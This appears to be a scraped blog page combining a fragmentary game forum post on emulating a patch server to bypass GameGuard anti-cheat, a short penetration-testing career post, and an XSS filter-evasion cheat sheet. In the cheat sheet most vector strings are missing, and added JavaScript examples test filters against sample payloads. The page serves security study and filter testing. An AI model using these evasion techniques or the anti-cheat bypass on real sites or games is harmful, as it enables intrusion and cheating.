LIMIT = 420


_sLocHgverFilename
http://cdn.ijjimax.com/nhnusa/games/.../patch/u_sf.cv

-------->1003



All this upper GET this thing for c++ D3d_ASM emu


u_sf_ppinfo.ini
Code:
 
#PrePatch info.( FOR REAL SOLDIER FRONT)
[URLs]
PREPATCH  = http://cdn.ijjimax.com/nhnusa/games/.../U_SF/prepatch
PATCH   = http://cdn.ijjimax.com/nhnusa/games/arcade/U_SF/patch
CDNTRAFFIC = http://services.ijji.com/service/cdn/traffic
[Registry]
KEY_INSTALL = SOFTWARE\Dragonfly\soldierfront
VALUE_PATH  = installPath
[CDN]
#Unit - Megabits/sec
LIMIT  = 270
[Extend]
INSTALL_PATH_TRIM_RIGHT = 1
[Condition]
#0= none, 1 = File CheckSum, 2=Registry Check
OVERWRITECHECK = 0
#if OVERWRITECHECK 1 = File Name, 2=Registry Value Name
INFO = NULL
#if OVERWRITECHECK 1 = CheckSum Value, 2=Registry Value
VALUE = 0
[Patch]
# available values = hul, skip
METHOD = hul
[CPPImpl::DoPatching]Complete Prepatch

[CPPImpl::POST_COMPLETE_PREPATCH] Code = [0]
_______________________________
Succeeded to download prepatch version

//lobbydata39.mrg
File attached

/////////////////////////////////////////////////////////////////

--- CDN TRAFFIC BY MITCH1490 ---

////////////////////////////////////////////////////////////////

//ALL PRE-PATCH & PATCH & CDN TRAFFIC EMU

[URLs]
PREPATCH = http://cdn.ijjimax.com/nhnusa/games/.../U_SF/prepatch
PATCH = http://cdn.ijjimax.com/nhnusa/games/arcade/U_SF/patch
CDNTRAFFIC = http://services.ijji.com/service/cdn/traffic

//INSTALL REG PATH

[Registry]
KEY_INSTALL = SOFTWARE\Dragonfly\soldierfront
VALUE_PATH = installPath

//CDN MEANS THE NETWORK LIMIT PING

[CDN]
#Unit - Megabits/sec
LIMIT = 270

//TRIM PATH

[Extend]
INSTALL_PATH_TRIM_RIGHT = 1 //ONE MEANS ENABLED

//MANAGE UR REG

[Condition]
#0= none, 1 = File CheckSum, 2=Registry Check
OVERWRITECHECK = 0

#if OVERWRITECHECK 1 = File Name, 2=Registry Value Name
INFO = NULL

#if OVERWRITECHECK 1 = CheckSum Value, 2=Registry Value
VALUE = 0


//YOU HAVE CHOICES TO EMULATE SERVER HUL OR ONLY SKIP.

[Patch]
# available values = hul, skip
METHOD = hul

/////////////////////////////////////////////////////////END/////////////////////////////////////////////////////////////

After looking and searching in those folders you can simply know what the GameGuard emulation is searching for and checking: that the files are all the same format as those coming from the IJJI server.

You have different ways of going into this to bypass|emulate, enabled with knowledge.

Have a nice day.

If I helped you somehow, please hit the thanks button.
_____________________________________________
Peace,
Mitch1490 ^_^

CReditz to Myself.

La PsyCadely Du Violet.
Attached Files
File Type: zip purple.zip (3.2 KB, 75 views)
File Type: zip lobbydata39.mrg.zip (844.1 KB, 75 views)
File Type: zip EMU SERVER.zip (930.5 KB, 98 views)

Last edited by Carbone14; 01-21-2009 at 02:16 PM. Reason: Added Purple Folder to path includes.

Posted by CEOinIRVINE

I have decided to keep my originality about all postings here. The Internet is such a nice place to find information and share knowledge. I completely agree with that. However, sometimes I feel so bad that I don't write anything about my postings when I have just copied and pasted somebody's useful information/postings.

In this posting, I would like to cover how to start as a web penetration tester and how to be recognized by other professionals in the same field.

First of all, I recommend that you visit the OWASP web page
(the free and open application security community):


http://www.owasp.org/index.php/Main_Page


Then, please visit the following website to get basic security information:

http://www.owasp.org/index.php/Category:OWASP_CAL9000_Project

Just download that project and unzip it.
You will find a lot of cheat sheets in there.
They are very useful information for starters/beginners/wannabe security professionals.


After that, I would become a sed/awk guru who can analyze logs quickly.
That's the best way for you to get recognition from others.
They will respect you after noticing your fantastic skills at analyzing and solving issues.


counterhacker@gmail.com

Posted by CEOinIRVINE

XSS Cheat Sheet

Hacking 2009. 2. 6. 09:41

XSS (Cross Site Scripting) Cheat Sheet
Esp: for filter evasion


By RSnake

Note from the author: XSS is Cross Site Scripting. If you don't know how XSS (Cross Site Scripting) works, this page probably won't help you. This page is for people who already understand the basics of XSS attacks but want a deep understanding of the nuances regarding filter evasion. This page will also not show you how to mitigate XSS vectors or how to write the actual cookie/credential stealing/replay/session riding portion of the attack. It will simply show the underlying methodology and you can infer the rest. Also, please note my XSS page has been replicated by the OWASP 2.0 Guide in the Appendix section with my permission. However, because this is a living document I suggest you continue to use this site to stay up to date.

Also, please note that most of these cross site scripting vectors have been tested in the browsers listed at the bottom of the page, however, if you have specific concerns about outdated or obscure versions please download them from Evolt. Please see the XML format of the XSS Cheat Sheet if you intend to use CAL9000 or other automated tools. If you have an RSS reader feel free to subscribe to the Web Application Security RSS feed below, or join the forum:

Web Application Security RSS feed


XSS (Cross Site Scripting):
    XSS locator. Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use the URL encoding calculator below to encode the entire string. Tip: if you're in a rush and need to quickly check a page, oftentimes injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    XSS locator 2. If you don't have much space and know there is no vulnerable JavaScript on the page, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Image XSS using the JavaScript directive (IE7.0 doesn't support the JavaScript directive in context of an image, but it does in other contexts, but the following show the principles that would work in other tags as well - I'll probably revise this at a later date):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    No quotes and no semicolon:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Case insensitive XSS attack vector:

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    HTML entities (the semicolons are required for this to work):

    Browser support: [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]


    Grave accent obfuscation (If you need to use both double and single quotes you can use a grave accent to encapsulate the JavaScript string - this is also useful because lots of cross site scripting filters don't know about grave accents):



    Malformed IMG tags. Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to build the vector inside an IMG attribute value that should have been encapsulated in quotes. I assume this leniency was originally meant to cope with sloppy coding. It makes it significantly more difficult to correctly parse apart an HTML tag:



    fromCharCode (if no quotes of any kind are allowed you can eval() a String.fromCharCode() expression in JavaScript to create any XSS vector you need; the original page linked a generator for this, thanks to Hannes Leopold):



    UTF-8 Unicode encoding (all of the XSS examples that use a javascript: directive inside of an <IMG tag will not work in Firefox or Netscape 8.1+ in the Gecko rendering engine mode). Use the XSS calculator for more information:



    Long UTF-8 Unicode encoding without semicolons (this is often effective against filters that look for "&#XX;", since most people don't know about padding - up to 7 numeric characters in total). It is also useful against code that decodes with a regex like $tmp_string =~ s/.*\&#(\d+);.*/$1/, which incorrectly assumes a semicolon is required to terminate an HTML-encoded character (I've seen this in the wild):



    Hex encoding without semicolons (this is also a viable XSS attack against the above regex $tmp_string =~ s/.*\&#(\d+);.*/$1/, which assumes that a decimal digit follows the pound symbol - which is not true for hex HTML character references). Use the XSS calculator for more information:



    Embedded tab to break up the cross site scripting attack:


    Embedded encoded tab to break up XSS:



    Embedded newline to break up XSS. Some websites claim that any of the characters 09-13 (decimal) will work for this attack. That is incorrect. Only 09 (horizontal tab), 10 (newline) and 13 (carriage return) work. See the ASCII chart for more details. The following four XSS examples illustrate this vector:



    Embedded carriage return to break up XSS (Note: in the above I am making these strings longer than they have to be, because the zeros could be omitted. I've often seen filters that assume the hex and decimal encoding has to be two or three characters. The real rule is 1-7 characters):



    Multiline injected JavaScript using ASCII carriage returns (the same as above, only a more extreme example of this XSS vector; these are not spaces, just one of the three characters described above):



    Null breaks up JavaScript directive. Okay, I lied: null characters also work as XSS vectors, but not like the above. You need to inject them directly using something like Burp Proxy, or use %00 in the URL string; if you want to write your own injection tool you can either use vim (^V^@ will produce a null) or the following program to generate it into a text file. Okay, I lied again: older versions of Opera (circa 7.11 on Windows) were vulnerable to one additional character, 173 (the soft hyphen control character). But the null character %00 is much more useful, and helped me bypass certain real world filters with a variation on this example:



    Null breaks up cross site scripting vector. Here is a little-known XSS attack vector using null characters. You can actually break up the HTML itself using the same nulls as shown above. I've seen this vector bypass some of the most restrictive XSS filters to date:



    Spaces and meta chars before the JavaScript in images for XSS (this is useful if the pattern match doesn't take into account spaces inside the word "javascript:" - which is correct, since that won't render - but makes the false assumption that you can't have a space between the quote and the "javascript:" keyword. In reality any character from 1 to 32 in decimal can appear there):

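    Added example, not the cheat sheet's own code: the decoding rules the entries above describe, written out the way a filter would need them. Part 1 encodes and decodes numeric character references in the padded and semicolon-less decimal and hex forms; part 2 normalises an attribute value the way the text says browsers do (characters 1-32 dropped before the scheme; tab, newline, carriage return and null ignored inside it) before deciding whether it is a javascript: URL. The "naive" functions are the kind of check the text says these vectors bypass. javascript:alert(1) and example.com are placeholders, and the normaliser models the described behaviour rather than any one browser's code.

```javascript
// Added example, not the cheat sheet's code. Part 1: numeric character
// references with padding and missing semicolons. Part 2: javascript: scheme
// detection after the normalisation the text describes. Placeholders:
// javascript:alert(1) and example.com.

// Encode every character of `s` as a numeric reference. `pad` left-pads the
// digits with zeros (the text's rule: 1-7 characters in total);
// `semicolon: false` drops the terminator, which browsers do not require.
function encodeNumeric(s, { hex = false, pad = 0, semicolon = true } = {}) {
  return Array.from(s, (ch) => {
    const cp = ch.codePointAt(0);
    const digits = (hex ? cp.toString(16) : String(cp)).padStart(pad, '0');
    return '&#' + (hex ? 'x' : '') + digits + (semicolon ? ';' : '');
  }).join('');
}

// Tolerant decoder: decimal or hex, 1-7 digits, optional ';'. Padding to the
// full 7 digits also removes any ambiguity about where a reference ends when
// the semicolon is omitted.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]{1,7}|[0-9]{1,7});?/gi, (_, num) => {
    const code = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return String.fromCodePoint(code);
  });
}

// The Perl filter quoted in the text, $tmp_string =~ s/.*\&#(\d+);.*/$1/,
// reduced to its matching condition: a decimal reference ending in ';'.
function naiveRefFilterMatches(s) {
  return /&#(\d+);/.test(s);
}

// Naive scheme check: a literal match against the raw attribute value.
function naiveIsJavascriptUrl(raw) {
  return /^\s*javascript:/i.test(raw);
}

// Browser-style check: decode references, drop leading characters 1-32,
// strip the tab/newline/CR/null bytes the text says are ignored in the scheme.
function isJavascriptUrl(raw) {
  const decoded = decodeNumericRefs(raw);
  const trimmed = decoded.replace(/^[\x01-\x20]+/, '');
  const scheme = trimmed.replace(/[\t\n\r\0]/g, '');
  return /^javascript:/i.test(scheme);
}

// Constructed samples of the forms described above.
const SAMPLES = [
  'javascript:alert(1)',
  encodeNumeric('javascript:alert(1)', { pad: 7, semicolon: false }),   // &#0000106&#0000097...
  encodeNumeric('javascript:alert(1)', { hex: true, semicolon: false }), // &#x6a&#x61...
  'jav&#x09;ascript:alert(1)',   // encoded tab inside the keyword
  '&#14;javascript:alert(1)',    // a control character before the scheme
  'java\u0000script:alert(1)',   // embedded null
  'http://example.com/',
];
for (const s of SAMPLES) {
  console.log(JSON.stringify(s), 'naive:', naiveIsJavascriptUrl(s), 'normalised:', isJavascriptUrl(s));
}
```

    Run it with node: the naive checks report false on every obfuscated form, while the tolerant decoder and normaliser recover the scheme each time, which is exactly the gap between what the filter sees and what the browser executes.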


    Non-alpha-non-digit XSS. While I was reading the Firefox HTML parser I found that it assumes a non-alpha-non-digit character is not valid after an HTML keyword and therefore treats it as whitespace or a non-valid token after an HTML tag. The problem is that some XSS filters assume that the tag they are looking for is followed by whitespace. For example "<SCRIPT\s" != "<SCRIPT/XSS\s":



    Non-alpha-non-digit part 2 XSS. yawnmoth brought my attention to this vector, based on the same idea as above; however, I expanded on it using my fuzzer. The Gecko rendering engine allows any character other than letters, numbers or encapsulation characters (like quotes, angle brackets, etc.) between the event handler and the equals sign, making it easier to bypass cross site scripting blocks. Note that this also applies to the grave accent character, as seen here:



    Non-alpha-non-digit part 3 XSS. Yair Amit brought to my attention that there is slightly different behavior between the IE and Gecko rendering engines that allows just a slash between the tag and the attribute with no spaces. This could be useful if the system does not allow spaces:



    Extraneous open brackets. Submitted by Franz Sedlmaier, this XSS vector could defeat certain detection engines that work by first matching pairs of open and close angle brackets and then comparing the tag inside, instead of a more efficient algorithm like Boyer-Moore that looks for entire string matches of the open angle bracket and associated tag (post de-obfuscation, of course). The double slash comments out the ending extraneous bracket to suppress a JavaScript error:



    No closing script tags. In Firefox and Netscape 8.1 in the Gecko rendering engine mode you don't actually need the "></SCRIPT>" portion of this Cross Site Scripting vector. Firefox assumes it's safe to close the HTML tag and adds closing tags for you. How thoughtful! Unlike the next one, which doesn't affect Firefox, this does not require any additional HTML below it. You can add quotes if you need to, but they're not needed generally, although beware, I have no idea what the HTML will end up looking like once this is injected:



    Protocol resolution in script tags. This particular variant was submitted by Łukasz Pilorz and was based partly on Ozh's protocol resolution bypass below. This cross site scripting example works in IE, Netscape in IE rendering mode and Opera if you add a </SCRIPT> tag at the end. It is especially useful where space is an issue, and of course, the shorter your domain, the better. The ".j" is valid regardless of the encoding type, because the browser knows what it is in the context of a SCRIPT tag:



    Half open HTML/JavaScript XSS vector. Unlike Firefox, the IE rendering engine doesn't add extra data to your page, but it does allow the javascript: directive in images. This is useful as a vector because it doesn't require a close angle bracket. It assumes there is some HTML tag below where you are injecting this cross site scripting vector: even though there is no closing ">", the tags below it will close it. A note: this does mess up the HTML, depending on what HTML is beneath it. It gets around the following NIDS regex: /((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't require the end ">". As a side note, this was also effective against a real world XSS filter I came across, using an open ended <IFRAME tag instead of an <IMG tag:



    Double open angle brackets. This is an odd one that Steven Christey brought to my attention. At first I misclassified this as the same XSS vector as above but it's surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape Gecko rendering. Without it, Firefox will work but Netscape won't:



    XSS with no single quotes or double quotes or semicolons:



    Escaping JavaScript escapes. When the application is written to output some user information inside of JavaScript like the following: <SCRIPT>var a="$ENV{QUERY_STRING}";</SCRIPT> and you want to inject your own JavaScript into it, but the server side application escapes certain quotes, you can circumvent that by escaping their escape character. When this gets injected it will read <SCRIPT>var a="\\";alert('XSS');//";</SCRIPT>, which ends up un-escaping the double quote and causing the Cross Site Scripting vector to fire. The XSS locator uses this method:

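    Added example, not the cheat sheet's own code: the escaping bug described above as a vulnerable encoder beside a safe one, with a small scanner that reports where a JavaScript engine would actually close the string literal. The template and the payload are the ones the text gives; the safe encoder is an assumption about what a fix should look like, not code from the page.

```javascript
// Added example, not the cheat sheet's code: "escaping JavaScript escapes".
// Template and payload as given in the text; safeJsEscape is an assumed fix.

// Vulnerable: escapes the double quote but not the backslash, so an input
// ending in a backslash swallows the escape the application adds.
function naiveJsEscape(s) {
  return s.replace(/"/g, '\\"');
}

// Safe: \uXXXX-encode everything that can end the literal or the script
// block: backslash, both quotes, angle brackets, slash and line terminators.
function safeJsEscape(s) {
  return s.replace(/[\\"'<>\/\r\n\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

// The server-side template from the text, with the escaper plugged in.
function render(escape, input) {
  return '<SCRIPT>var a="' + escape(input) + '";</SCRIPT>';
}

// Index of the first double quote not preceded by an escaping backslash,
// i.e. where the literal opened by the template ends; -1 means the injected
// text never leaves the string.
function unescapedQuoteIndex(literalBody) {
  for (let i = 0; i < literalBody.length; i++) {
    if (literalBody[i] === '\\') { i++; continue; }
    if (literalBody[i] === '"') return i;
  }
  return -1;
}

// The injection from the text: \";alert('XSS');//
const PAYLOAD = '\\";alert(\'XSS\');//';

console.log(render(naiveJsEscape, PAYLOAD)); // literal closes after the doubled backslash
console.log(render(safeJsEscape, PAYLOAD));  // payload stays inside the string
```

    With the naive encoder the rendered script is exactly the line quoted in the text, and the scanner places the end of the literal at index 2, right after the two backslashes; with the safe encoder no unescaped quote remains, the angle brackets are encoded too (so a </SCRIPT> in the input cannot end the block), and the value the browser sees is still the original input.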


    End title tag. This is a simple XSS vector that closes an open <TITLE> tag, which would otherwise swallow the malicious cross site scripting attack:



    INPUT image:



    BODY image:



    BODY tag (I like this method because it doesn't require using any variants of "javascript:" or "<SCRIPT..." to accomplish the XSS attack). Dan Crowley additionally noted that you can put a space before the equals sign ("onload=" != "onload ="):



    Event Handlers that can be used in similar XSS attacks to the one above (this is the most comprehensive list on the net, at the time of this writing). Please note I have excluded browser support from this section because each one may have different results in different browsers. Thanks to Rene Ledosquet for the HTML+TIME updates:



    IMG Dynsrc:



    IMG lowsrc:



    BGSOUND:



    & JavaScript includes (works in Netscape 4.x):



    LAYER (also only works in Netscape 4.x):



    STYLE sheet:



    Remote style sheet (using something as simple as a remote style sheet you can include your XSS, as the style parameter can be redefined using an embedded expression). This only works in IE and Netscape 8.1+ in IE rendering engine mode. Notice that there is nothing on the page to show that there is included JavaScript. Note: all of these remote style sheet examples use the body tag, so it won't work unless there is some content on the page other than the vector itself; you'll need to add a single letter to the page to make it work if it's an otherwise blank page:



    Remote style sheet part 2 (this works the same as above, but uses a <STYLE> tag instead of a <LINK> tag). A slight variation on this vector was used to hack Google Desktop. As a side note, you can remove the end </STYLE> tag if there is HTML immediately after the vector to close it. This is useful if you cannot have either an equals sign or a slash in your cross site scripting attack, which has come up at least once in the real world:



    Remote style sheet part 3. This only works in Opera 8.0 (no longer in 9.x) but is fairly tricky. According to RFC 2616 a Link header is not part of the HTTP/1.1 spec, yet some browsers still honor it (like Firefox and Opera). The trick here is that I am setting a header (which is basically no different from the HTTP header saying Link: <http://ha.ckers.org/xss.css>; REL=stylesheet), and the remote style sheet with my cross site scripting vector is running the JavaScript, which is not supported in Firefox:



    Remote style sheet part 4. This only works in Gecko rendering engines and works by binding an XUL file to the parent page. I think the irony here is that Netscape assumes that Gecko is safer and is therefore vulnerable to this for the vast majority of sites:



    Local htc file. This is a little different than the above two cross site scripting vectors because it uses an .htc file which must be on the same server as the XSS vector. The example file works by pulling in the JavaScript and running it as part of the style attribute:



    List-style-image. Fairly esoteric issue dealing with embedding images for bulleted lists. This will only work in the IE rendering engine because of the JavaScript directive. Not a particularly useful cross site scripting vector:



    VBscript in an image:



    Mocha (older versions of Netscape only):



    Livescript (older versions of Netscape only):



    US-ASCII encoding (found by Kurt Huwig). This uses malformed ASCII encoding with 7 bits instead of 8. This XSS may bypass many content filters but only works if the host transmits in US-ASCII encoding, or if you set the encoding yourself. This is more useful against web application firewall cross site scripting evasion than it is server side filter evasion. Apache Tomcat is the only known server that transmits in US-ASCII encoding. I highly suggest anyone interested in alternate encoding issues look at my charsets issues page:



    META (the odd thing about meta refresh is that it doesn't send a Referer header - so it can be used for certain types of attacks where you need to get rid of referring URLs):



    META using data: directive URL scheme. This is nice because it also doesn't have anything visible that has the word SCRIPT or the JavaScript directive in it, because it utilizes base64 encoding. Please see RFC 2397 for more details. You can also use the XSS calculator below if you just want to encode raw HTML or JavaScript, as it has a Base64 encoding method:



    META with additional URL parameter. If the target website attempts to see if the URL contains "http://" at the beginning you can evade it with the following technique (Submitted by Moritz Naumann):



    IFRAME (if iframes are allowed there are a lot of other XSS problems as well):



    FRAME (frames have the same sorts of XSS problems as iframes):



    TABLE (who would have thought tables were XSS targets... except me, of course):



    TD (just like above, TD's are vulnerable to BACKGROUNDs containing JavaScript XSS vectors):



    DIV background-image:



    DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz as a vulnerability in Hotmail:



    DIV background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8.13, 12288, 65279):



    DIV expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and "expression":



    STYLE tags with broken up JavaScript for XSS (this XSS at times sends IE into an infinite loop of alerts):



    STYLE attribute using a comment to break up expression (Thanks to Roman Ivanov for this one):



    Anonymous HTML with STYLE attribute (IE6.0 and Netscape 8.1+ in IE rendering engine mode don't really care if the HTML tag you build exists or not, as long as it starts with an open angle bracket and a letter):



    IMG STYLE with expression (this is really a hybrid of the above XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like above this can send IE into a loop):



    STYLE tag (Older versions of Netscape only):



    STYLE tag using background-image:



    STYLE tag using background:



    Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore not in need of removal, which allows our Cross Site Scripting vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job:



    BASE tag. Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like "images/image.jpg" rather than full paths. If the path includes a leading forward slash like "/images/image.jpg" you can remove one slash from this vector (as long as there are two to begin the comment this will work):



    OBJECT tag (if they allow objects, you can also inject virus payloads to infect the users, etc. and same with the APPLET tag). The linked file is actually an HTML file that can contain your XSS:



    Using an OBJECT tag you can embed XSS directly (this is unverified so no browser support is added):



    Using an EMBED tag you can embed a Flash movie that contains XSS (the original page linked a demo). If you add the attributes allowScriptAccess="never" and allowNetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info):



    You can EMBED SVG which can contain your XSS vector. This example only works in Firefox, but it's better than the above vector in Firefox because it does not require the user to have Flash turned on or installed. Thanks to nEUrOO for this one:



    Using ActionScript inside flash can obfuscate your XSS vector:



    XML namespace. The htc file must be located on the same server as your XSS vector:



    XML data island with CDATA obfuscation (this XSS attack works only in IE and Netscape 8.1 in IE rendering engine mode) - vector found by Sec Consult while auditing Yahoo:



    XML data island with comment obfuscation (this is another take on the same exploit that doesn't use CDATA fields, but rather uses comments to break up the javascript directive):



    Locally hosted XML with embedded JavaScript that is generated using an XML data island. This is the same as above but instead refers to a locally hosted (must be on the same server) XML file that contains your cross site scripting vector:



    HTML+TIME in XML. This is how Grey Magic hacked Hotmail and Yahoo!. This only works in Internet Explorer and Netscape 8.1 in IE rendering engine mode and remember that you need to be between HTML and BODY tags for this to work:



    Assuming you can only fit in a few characters and it filters against ".js" you can rename your JavaScript file to an image as an XSS vector:



    SSI (Server Side Includes) requires SSI to be installed on the server to use this XSS vector. I probably don't need to mention this, but if you can run commands on the server there are no doubt much more serious issues:



    PHP - requires PHP to be installed on the server to use this XSS vector. Again, if you can run any scripts remotely like this, there are probably much more dire issues:



    IMG Embedded commands - this works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc.... This is one of the lesser used but more useful XSS vectors:



    IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious, other than that it is not hosted on your own domain. The vector uses a 302 redirect (other redirect status codes work too) to send the image request back to a command. So a normal <IMG SRC="http://badguy.com/a.jpg"> could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this):



    Cookie manipulation - admittedly this is pretty obscure, but I have seen a few examples where <META is allowed and you can use it to overwrite cookies. There are other examples of sites where instead of fetching the username from a database it is stored inside of a cookie to be displayed only to the user who visits the page. With these two scenarios combined you can modify the victim's cookie, which will be displayed back to them as JavaScript (you can also use this to log people out or change their user states, get them to log in as you, etc.):



    UTF-7 encoding - if the page that the XSS resides on doesn't provide a page charset header, or the browser is set to UTF-7 encoding, it can be exploited with the following (thanks to Roman Ivanov for this one). You don't need the charset statement if the user's browser is set to auto-detect and there is no overriding content-type on the page, in Internet Explorer and Netscape 8.1 in IE rendering engine mode. This does not work in any modern browser without changing the encoding type, which is why it is marked as completely unsupported. Watchfire found this hole in Google's custom 404 script:




XSS using HTML quote encapsulation:
    This was tested in IE, your mileage may vary. For performing XSS on sites that allow "<SCRIPT>" but don't allow "<SCRIPT SRC..." by way of a regex filter "/<script[^>]+src/i" (the [^>]+ stops at the first > it meets, including one inside a quoted attribute value):



    For performing XSS on sites that allow "<SCRIPT>" but don't allow "<script src..." by way of a regex filter "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" (this is an important one, because I've seen this regex in the wild):



    Another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i":



    Yet another XSS to evade the same filter, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i". I know I said I wasn't going to discuss mitigation techniques, but the only thing I've seen work for this XSS example, if you still want to allow <SCRIPT> tags but not remote script, is a state machine (and of course there are other ways to get around this if they allow <SCRIPT> tags):



    And one last XSS attack to evade, "/<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i" using grave accents (again, doesn't work in Firefox):



    Here's an XSS example that bets on the fact that the regex won't catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly:



    This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content:

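    Added example, not the cheat sheet's own code, serving both the non-alpha-non-digit entries earlier on the page and this quote-encapsulation section: the two regex filters quoted above, run against vectors constructed from the shapes the text describes, beside a small state-machine tokenizer of the kind the text says is the only thing that works if <SCRIPT> must stay allowed. The tokenizer models the lenient parsing the page describes (the tag name ends at the first non-alphanumeric character, so "<SCRIPT/XSS" is still a SCRIPT tag; attribute values may be quoted with ", ' or a grave accent; stray tokens between attributes are skipped). It is a demonstration of the technique, not an HTML5 parser, and the script URL is a placeholder.

```javascript
// Added example, not the cheat sheet's code: the page's two regex filters
// versus a state-machine tokenizer, on constructed vectors. The script URL
// is a placeholder.

const REMOTE = 'http://example.com/xss.js';

const FILTER_NAIVE = /<script[^>]+src/i;
const FILTER_ATTRS =
  /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i;

// Constructed vectors, one per technique named in the text.
const VECTORS = {
  plain:       `<SCRIPT SRC="${REMOTE}"></SCRIPT>`,
  slashName:   `<SCRIPT/XSS SRC="${REMOTE}"></SCRIPT>`,       // non-alpha-non-digit after the tag name
  quotedJunk:  `<SCRIPT a=">" SRC="${REMOTE}"></SCRIPT>`,     // a ">" hidden inside a quoted value
  bareEquals:  `<SCRIPT =">" SRC="${REMOTE}"></SCRIPT>`,      // value with no attribute name
  emptyQuotes: `<SCRIPT a=">" '' SRC="${REMOTE}"></SCRIPT>`,  // stray quoted token
  quotedToken: `<SCRIPT "a='>'" SRC="${REMOTE}"></SCRIPT>`,   // quoted token, no name
  graveAccent: `<SCRIPT a=\`>\` SRC="${REMOTE}"></SCRIPT>`,   // grave-accent quoting
  docWrite:    `<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="${REMOTE}"></SCRIPT>`,
};

// Parse one tag that starts at html[i] === '<'. Returns null when no tag
// name follows the bracket (e.g. "</SCRIPT>").
function parseTag(html, i) {
  let j = i + 1;
  let name = '';
  while (j < html.length && /[A-Za-z0-9]/.test(html[j])) name += html[j++];
  if (!name) return null;
  const attrs = [];
  while (j < html.length && html[j] !== '>') {
    let attr = '';
    while (j < html.length && !/[\s=>"'`]/.test(html[j])) attr += html[j++];
    while (j < html.length && /\s/.test(html[j])) j++;
    let value = null;
    if (html[j] === '=') {
      j++;
      while (j < html.length && /\s/.test(html[j])) j++;
      const q = html[j];
      if (q === '"' || q === "'" || q === '`') {
        const close = html.indexOf(q, j + 1);
        value = html.slice(j + 1, close === -1 ? html.length : close);
        j = close === -1 ? html.length : close + 1;
      } else {
        value = '';
        while (j < html.length && !/[\s>]/.test(html[j])) value += html[j++];
      }
    } else if (html[j] === '"' || html[j] === "'" || html[j] === '`') {
      // a quoted token with no name ('' or "a='>'"): skip it whole
      const close = html.indexOf(html[j], j + 1);
      j = close === -1 ? html.length : close + 1;
    }
    if (attr) attrs.push({ name: attr.toLowerCase(), value });
    while (j < html.length && /\s/.test(html[j])) j++;
  }
  return { name: name.toLowerCase(), attrs, end: j };
}

// True when any SCRIPT tag in the markup carries a src attribute.
function scriptWithSrc(html) {
  for (let i = html.indexOf('<'); i !== -1; i = html.indexOf('<', i + 1)) {
    const tag = parseTag(html, i);
    if (tag && tag.name === 'script' && tag.attrs.some((a) => a.name === 'src')) return true;
  }
  return false;
}

// Every check on every vector; true means the vector was flagged.
function evaluate() {
  const out = {};
  for (const [label, html] of Object.entries(VECTORS)) {
    out[label] = {
      naive: FILTER_NAIVE.test(html),
      attrs: FILTER_ATTRS.test(html),
      tokenizer: scriptWithSrc(html),
    };
  }
  return out;
}

console.table(evaluate());
```

    The table shows the progression the text describes: the naive regex misses everything with a ">" inside a quoted value; the attribute-aware regex catches that case but still misses the slash-after-tag-name, bare-equals, stray-token and grave-accent forms; the tokenizer flags all of them. The document.write() vector is missed by all three, because the "PT SRC=" half only becomes part of a tag once the first script runs, which is the text's point that nothing short of blocking active content stops it.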




URL string evasion (assuming "http://www.google.com/" is programmatically disallowed):
    IP versus hostname:



    URL encoding:



